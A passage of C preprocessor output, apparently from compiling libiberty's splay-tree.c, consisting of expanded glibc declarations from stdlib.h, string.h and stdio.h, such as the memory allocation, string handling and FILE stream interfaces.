double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int erand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
double *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int lrand48_r (struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int nrand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int mrand48_r (struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int jrand48_r (unsigned short int __xsubi[3],
struct drand48_data *__restrict __buffer,
long int *__restrict __result)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int srand48_r (long int __seedval, struct drand48_data *__buffer)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int seed48_r (unsigned short int __seed16v[3],
struct drand48_data *__buffer) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int lcong48_r (unsigned short int __param[7],
struct drand48_data *__buffer)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern void *malloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__))
__attribute__ ((__alloc_size__ (1))) ;
extern void *calloc (size_t __nmemb, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (1, 2))) ;
extern void *realloc (void *__ptr, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__)) __attribute__ ((__alloc_size__ (2)));
extern void *reallocarray (void *__ptr, size_t __nmemb, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__warn_unused_result__))
__attribute__ ((__alloc_size__ (2, 3)));
extern void free (void *__ptr) __attribute__ ((__nothrow__ , __leaf__));
# 1 "/usr/include/alloca.h" 1 3 4
# 24 "/usr/include/alloca.h" 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 1 3 4
# 25 "/usr/include/alloca.h" 2 3 4
extern void *alloca (size_t __size) __attribute__ ((__nothrow__ , __leaf__));
# 569 "/usr/include/stdlib.h" 2 3 4
extern void *valloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__))
__attribute__ ((__alloc_size__ (1))) ;
extern int posix_memalign (void **__memptr, size_t __alignment, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern void *aligned_alloc (size_t __alignment, size_t __size)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__alloc_size__ (2))) ;
extern void abort (void) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern int atexit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int at_quick_exit (void (*__func) (void)) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int on_exit (void (*__func) (int __status, void *__arg), void *__arg)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void quick_exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern void _Exit (int __status) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__noreturn__));
extern char *getenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern char *secure_getenv (const char *__name)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
extern int putenv (char *__string) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int setenv (const char *__name, const char *__value, int __replace)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int unsetenv (const char *__name) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int clearenv (void) __attribute__ ((__nothrow__ , __leaf__));
# 675 "/usr/include/stdlib.h" 3 4
extern char *mktemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 688 "/usr/include/stdlib.h" 3 4
extern int mkstemp (char *__template) __attribute__ ((__nonnull__ (1))) ;
# 698 "/usr/include/stdlib.h" 3 4
extern int mkstemp64 (char *__template) __attribute__ ((__nonnull__ (1))) ;
# 710 "/usr/include/stdlib.h" 3 4
extern int mkstemps (char *__template, int __suffixlen) __attribute__ ((__nonnull__ (1))) ;
# 720 "/usr/include/stdlib.h" 3 4
extern int mkstemps64 (char *__template, int __suffixlen)
__attribute__ ((__nonnull__ (1))) ;
# 731 "/usr/include/stdlib.h" 3 4
extern char *mkdtemp (char *__template) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 742 "/usr/include/stdlib.h" 3 4
extern int mkostemp (char *__template, int __flags) __attribute__ ((__nonnull__ (1))) ;
# 752 "/usr/include/stdlib.h" 3 4
extern int mkostemp64 (char *__template, int __flags) __attribute__ ((__nonnull__ (1))) ;
# 762 "/usr/include/stdlib.h" 3 4
extern int mkostemps (char *__template, int __suffixlen, int __flags)
__attribute__ ((__nonnull__ (1))) ;
# 774 "/usr/include/stdlib.h" 3 4
extern int mkostemps64 (char *__template, int __suffixlen, int __flags)
__attribute__ ((__nonnull__ (1))) ;
# 784 "/usr/include/stdlib.h" 3 4
extern int system (const char *__command) ;
extern char *canonicalize_file_name (const char *__name)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 800 "/usr/include/stdlib.h" 3 4
extern char *realpath (const char *__restrict __name,
char *__restrict __resolved) __attribute__ ((__nothrow__ , __leaf__)) ;
typedef int (*__compar_fn_t) (const void *, const void *);
typedef __compar_fn_t comparison_fn_t;
typedef int (*__compar_d_fn_t) (const void *, const void *, void *);
extern void *bsearch (const void *__key, const void *__base,
size_t __nmemb, size_t __size, __compar_fn_t __compar)
__attribute__ ((__nonnull__ (1, 2, 5))) ;
# 1 "/usr/include/x86_64-linux-gnu/bits/stdlib-bsearch.h" 1 3 4
# 19 "/usr/include/x86_64-linux-gnu/bits/stdlib-bsearch.h" 3 4
extern __inline __attribute__ ((__gnu_inline__)) void *
bsearch (const void *__key, const void *__base, size_t __nmemb, size_t __size,
__compar_fn_t __compar)
{
size_t __l, __u, __idx;
const void *__p;
int __comparison;
__l = 0;
__u = __nmemb;
while (__l < __u)
{
__idx = (__l + __u) / 2;
__p = (void *) (((const char *) __base) + (__idx * __size));
__comparison = (*__compar) (__key, __p);
if (__comparison < 0)
__u = __idx;
else if (__comparison > 0)
__l = __idx + 1;
else
return (void *) __p;
}
return ((void *)0);
}
# 826 "/usr/include/stdlib.h" 2 3 4
extern void qsort (void *__base, size_t __nmemb, size_t __size,
__compar_fn_t __compar) __attribute__ ((__nonnull__ (1, 4)));
extern void qsort_r (void *__base, size_t __nmemb, size_t __size,
__compar_d_fn_t __compar, void *__arg)
__attribute__ ((__nonnull__ (1, 4)));
extern int abs (int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern long int labs (long int __x) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
__extension__ extern long long int llabs (long long int __x)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern div_t div (int __numer, int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
extern ldiv_t ldiv (long int __numer, long int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
__extension__ extern lldiv_t lldiv (long long int __numer,
long long int __denom)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__)) ;
# 872 "/usr/include/stdlib.h" 3 4
extern char *ecvt (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *fcvt (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *gcvt (double __value, int __ndigit, char *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ;
extern char *qecvt (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *qfcvt (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4))) ;
extern char *qgcvt (long double __value, int __ndigit, char *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3))) ;
extern int ecvt_r (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign, char *__restrict __buf,
size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int fcvt_r (double __value, int __ndigit, int *__restrict __decpt,
int *__restrict __sign, char *__restrict __buf,
size_t __len) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int qecvt_r (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign,
char *__restrict __buf, size_t __len)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int qfcvt_r (long double __value, int __ndigit,
int *__restrict __decpt, int *__restrict __sign,
char *__restrict __buf, size_t __len)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3, 4, 5)));
extern int mblen (const char *__s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern int mbtowc (wchar_t *__restrict __pwc,
const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern int wctomb (char *__s, wchar_t __wchar) __attribute__ ((__nothrow__ , __leaf__));
extern size_t mbstowcs (wchar_t *__restrict __pwcs,
const char *__restrict __s, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern size_t wcstombs (char *__restrict __s,
const wchar_t *__restrict __pwcs, size_t __n)
__attribute__ ((__nothrow__ , __leaf__));
extern int rpmatch (const char *__response) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1))) ;
# 957 "/usr/include/stdlib.h" 3 4
extern int getsubopt (char **__restrict __optionp,
char *const *__restrict __tokens,
char **__restrict __valuep)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2, 3))) ;
extern int posix_openpt (int __oflag) ;
extern int grantpt (int __fd) __attribute__ ((__nothrow__ , __leaf__));
extern int unlockpt (int __fd) __attribute__ ((__nothrow__ , __leaf__));
extern char *ptsname (int __fd) __attribute__ ((__nothrow__ , __leaf__)) ;
extern int ptsname_r (int __fd, char *__buf, size_t __buflen)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int getpt (void);
extern int getloadavg (double __loadavg[], int __nelem)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 1013 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdlib-float.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdlib-float.h" 3 4
extern __inline __attribute__ ((__gnu_inline__)) double
__attribute__ ((__nothrow__ , __leaf__)) atof (const char *__nptr)
{
return strtod (__nptr, (char **) ((void *)0));
}
# 1014 "/usr/include/stdlib.h" 2 3 4
# 1023 "/usr/include/stdlib.h" 3 4
# 33 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 2
# 1 "/usr/include/string.h" 1 3 4
# 26 "/usr/include/string.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 27 "/usr/include/string.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 1 3 4
# 34 "/usr/include/string.h" 2 3 4
# 43 "/usr/include/string.h" 3 4
extern void *memcpy (void *__restrict __dest, const void *__restrict __src,
size_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern void *memmove (void *__dest, const void *__src, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern void *memccpy (void *__restrict __dest, const void *__restrict __src,
int __c, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern void *memset (void *__s, int __c, size_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int memcmp (const void *__s1, const void *__s2, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
# 91 "/usr/include/string.h" 3 4
extern void *memchr (const void *__s, int __c, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
# 104 "/usr/include/string.h" 3 4
extern void *rawmemchr (const void *__s, int __c)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
# 115 "/usr/include/string.h" 3 4
extern void *memrchr (const void *__s, int __c, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
extern char *strcpy (char *__restrict __dest, const char *__restrict __src)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern char *strncpy (char *__restrict __dest,
const char *__restrict __src, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern char *strcat (char *__restrict __dest, const char *__restrict __src)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern char *strncat (char *__restrict __dest, const char *__restrict __src,
size_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int strcmp (const char *__s1, const char *__s2)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern int strncmp (const char *__s1, const char *__s2, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern int strcoll (const char *__s1, const char *__s2)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern size_t strxfrm (char *__restrict __dest,
const char *__restrict __src, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int strcoll_l (const char *__s1, const char *__s2, locale_t __l)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2, 3)));
extern size_t strxfrm_l (char *__dest, const char *__src, size_t __n,
locale_t __l) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2, 4)));
extern char *strdup (const char *__s)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__nonnull__ (1)));
extern char *strndup (const char *__string, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) __attribute__ ((__nonnull__ (1)));
# 226 "/usr/include/string.h" 3 4
extern char *strchr (const char *__s, int __c)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
# 253 "/usr/include/string.h" 3 4
extern char *strrchr (const char *__s, int __c)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
# 266 "/usr/include/string.h" 3 4
extern char *strchrnul (const char *__s, int __c)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
extern size_t strcspn (const char *__s, const char *__reject)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern size_t strspn (const char *__s, const char *__accept)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
# 303 "/usr/include/string.h" 3 4
extern char *strpbrk (const char *__s, const char *__accept)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
# 330 "/usr/include/string.h" 3 4
extern char *strstr (const char *__haystack, const char *__needle)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern char *strtok (char *__restrict __s, const char *__restrict __delim)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern char *__strtok_r (char *__restrict __s,
const char *__restrict __delim,
char **__restrict __save_ptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2, 3)));
extern char *strtok_r (char *__restrict __s, const char *__restrict __delim,
char **__restrict __save_ptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2, 3)));
# 360 "/usr/include/string.h" 3 4
extern char *strcasestr (const char *__haystack, const char *__needle)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern void *memmem (const void *__haystack, size_t __haystacklen,
const void *__needle, size_t __needlelen)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 3)));
extern void *__mempcpy (void *__restrict __dest,
const void *__restrict __src, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern void *mempcpy (void *__restrict __dest,
const void *__restrict __src, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern size_t strlen (const char *__s)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
extern size_t strnlen (const char *__string, size_t __maxlen)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
extern char *strerror (int __errnum) __attribute__ ((__nothrow__ , __leaf__));
# 421 "/usr/include/string.h" 3 4
extern char *strerror_r (int __errnum, char *__buf, size_t __buflen)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2))) ;
extern char *strerror_l (int __errnum, locale_t __l) __attribute__ ((__nothrow__ , __leaf__));
# 1 "/usr/include/strings.h" 1 3 4
# 23 "/usr/include/strings.h" 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 1 3 4
# 24 "/usr/include/strings.h" 2 3 4
extern int bcmp (const void *__s1, const void *__s2, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern void bcopy (const void *__src, void *__dest, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern void bzero (void *__s, size_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 68 "/usr/include/strings.h" 3 4
extern char *index (const char *__s, int __c)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
# 96 "/usr/include/strings.h" 3 4
extern char *rindex (const char *__s, int __c)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
extern int ffs (int __i) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern int ffsl (long int __l) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
__extension__ extern int ffsll (long long int __ll)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__const__));
extern int strcasecmp (const char *__s1, const char *__s2)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern int strncasecmp (const char *__s1, const char *__s2, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern int strcasecmp_l (const char *__s1, const char *__s2, locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2, 3)));
extern int strncasecmp_l (const char *__s1, const char *__s2,
size_t __n, locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2, 4)));
# 433 "/usr/include/string.h" 2 3 4
extern void explicit_bzero (void *__s, size_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern char *strsep (char **__restrict __stringp,
const char *__restrict __delim)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern char *strsignal (int __sig) __attribute__ ((__nothrow__ , __leaf__));
extern char *__stpcpy (char *__restrict __dest, const char *__restrict __src)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern char *stpcpy (char *__restrict __dest, const char *__restrict __src)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern char *__stpncpy (char *__restrict __dest,
const char *__restrict __src, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern char *stpncpy (char *__restrict __dest,
const char *__restrict __src, size_t __n)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int strverscmp (const char *__s1, const char *__s2)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1, 2)));
extern char *strfry (char *__string) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void *memfrob (void *__s, size_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 487 "/usr/include/string.h" 3 4
extern char *basename (const char *__filename) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 499 "/usr/include/string.h" 3 4
# 36 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 2
# 1 "/usr/include/stdio.h" 1 3 4
# 27 "/usr/include/stdio.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 28 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 1 3 4
# 34 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stdarg.h" 1 3 4
# 40 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stdarg.h" 3 4
typedef __builtin_va_list __gnuc_va_list;
# 37 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 1 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 1 3 4
# 13 "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h" 3 4
typedef struct
{
int __count;
union
{
unsigned int __wch;
char __wchb[4];
} __value;
} __mbstate_t;
# 6 "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h" 2 3 4
typedef struct _G_fpos_t
{
__off_t __pos;
__mbstate_t __state;
} __fpos_t;
# 40 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h" 3 4
typedef struct _G_fpos64_t
{
__off64_t __pos;
__mbstate_t __state;
} __fpos64_t;
# 41 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__FILE.h" 1 3 4
struct _IO_FILE;
typedef struct _IO_FILE __FILE;
# 42 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/FILE.h" 1 3 4
struct _IO_FILE;
typedef struct _IO_FILE FILE;
# 43 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 1 3 4
# 35 "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h" 3 4
struct _IO_FILE;
struct _IO_marker;
struct _IO_codecvt;
struct _IO_wide_data;
typedef void _IO_lock_t;
struct _IO_FILE
{
int _flags;
char *_IO_read_ptr;
char *_IO_read_end;
char *_IO_read_base;
char *_IO_write_base;
char *_IO_write_ptr;
char *_IO_write_end;
char *_IO_buf_base;
char *_IO_buf_end;
char *_IO_save_base;
char *_IO_backup_base;
char *_IO_save_end;
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
int _flags2;
__off_t _old_offset;
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
_IO_lock_t *_lock;
__off64_t _offset;
struct _IO_codecvt *_codecvt;
struct _IO_wide_data *_wide_data;
struct _IO_FILE *_freeres_list;
void *_freeres_buf;
size_t __pad5;
int _mode;
char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};
# 44 "/usr/include/stdio.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/cookie_io_functions_t.h" 1 3 4
# 27 "/usr/include/x86_64-linux-gnu/bits/types/cookie_io_functions_t.h" 3 4
typedef __ssize_t cookie_read_function_t (void *__cookie, char *__buf,
size_t __nbytes);
typedef __ssize_t cookie_write_function_t (void *__cookie, const char *__buf,
size_t __nbytes);
typedef int cookie_seek_function_t (void *__cookie, __off64_t *__pos, int __w);
typedef int cookie_close_function_t (void *__cookie);
typedef struct _IO_cookie_io_functions_t
{
cookie_read_function_t *read;
cookie_write_function_t *write;
cookie_seek_function_t *seek;
cookie_close_function_t *close;
} cookie_io_functions_t;
# 47 "/usr/include/stdio.h" 2 3 4
typedef __gnuc_va_list va_list;
# 84 "/usr/include/stdio.h" 3 4
typedef __fpos_t fpos_t;
typedef __fpos64_t fpos64_t;
# 133 "/usr/include/stdio.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/stdio_lim.h" 1 3 4
# 134 "/usr/include/stdio.h" 2 3 4
extern FILE *stdin;
extern FILE *stdout;
extern FILE *stderr;
extern int remove (const char *__filename) __attribute__ ((__nothrow__ , __leaf__));
extern int rename (const char *__old, const char *__new) __attribute__ ((__nothrow__ , __leaf__));
extern int renameat (int __oldfd, const char *__old, int __newfd,
const char *__new) __attribute__ ((__nothrow__ , __leaf__));
# 164 "/usr/include/stdio.h" 3 4
extern int renameat2 (int __oldfd, const char *__old, int __newfd,
const char *__new, unsigned int __flags) __attribute__ ((__nothrow__ , __leaf__));
extern FILE *tmpfile (void) ;
# 183 "/usr/include/stdio.h" 3 4
extern FILE *tmpfile64 (void) ;
extern char *tmpnam (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ;
extern char *tmpnam_r (char *__s) __attribute__ ((__nothrow__ , __leaf__)) ;
# 204 "/usr/include/stdio.h" 3 4
extern char *tempnam (const char *__dir, const char *__pfx)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__malloc__)) ;
extern int fclose (FILE *__stream);
extern int fflush (FILE *__stream);
# 227 "/usr/include/stdio.h" 3 4
extern int fflush_unlocked (FILE *__stream);
# 237 "/usr/include/stdio.h" 3 4
extern int fcloseall (void);
# 246 "/usr/include/stdio.h" 3 4
extern FILE *fopen (const char *__restrict __filename,
const char *__restrict __modes) ;
extern FILE *freopen (const char *__restrict __filename,
const char *__restrict __modes,
FILE *__restrict __stream) ;
# 270 "/usr/include/stdio.h" 3 4
extern FILE *fopen64 (const char *__restrict __filename,
const char *__restrict __modes) ;
extern FILE *freopen64 (const char *__restrict __filename,
const char *__restrict __modes,
FILE *__restrict __stream) ;
extern FILE *fdopen (int __fd, const char *__modes) __attribute__ ((__nothrow__ , __leaf__)) ;
extern FILE *fopencookie (void *__restrict __magic_cookie,
const char *__restrict __modes,
cookie_io_functions_t __io_funcs) __attribute__ ((__nothrow__ , __leaf__)) ;
extern FILE *fmemopen (void *__s, size_t __len, const char *__modes)
__attribute__ ((__nothrow__ , __leaf__)) ;
extern FILE *open_memstream (char **__bufloc, size_t *__sizeloc) __attribute__ ((__nothrow__ , __leaf__)) ;
extern void setbuf (FILE *__restrict __stream, char *__restrict __buf) __attribute__ ((__nothrow__ , __leaf__));
extern int setvbuf (FILE *__restrict __stream, char *__restrict __buf,
int __modes, size_t __n) __attribute__ ((__nothrow__ , __leaf__));
extern void setbuffer (FILE *__restrict __stream, char *__restrict __buf,
size_t __size) __attribute__ ((__nothrow__ , __leaf__));
extern void setlinebuf (FILE *__stream) __attribute__ ((__nothrow__ , __leaf__));
extern int fprintf (FILE *__restrict __stream,
const char *__restrict __format, ...);
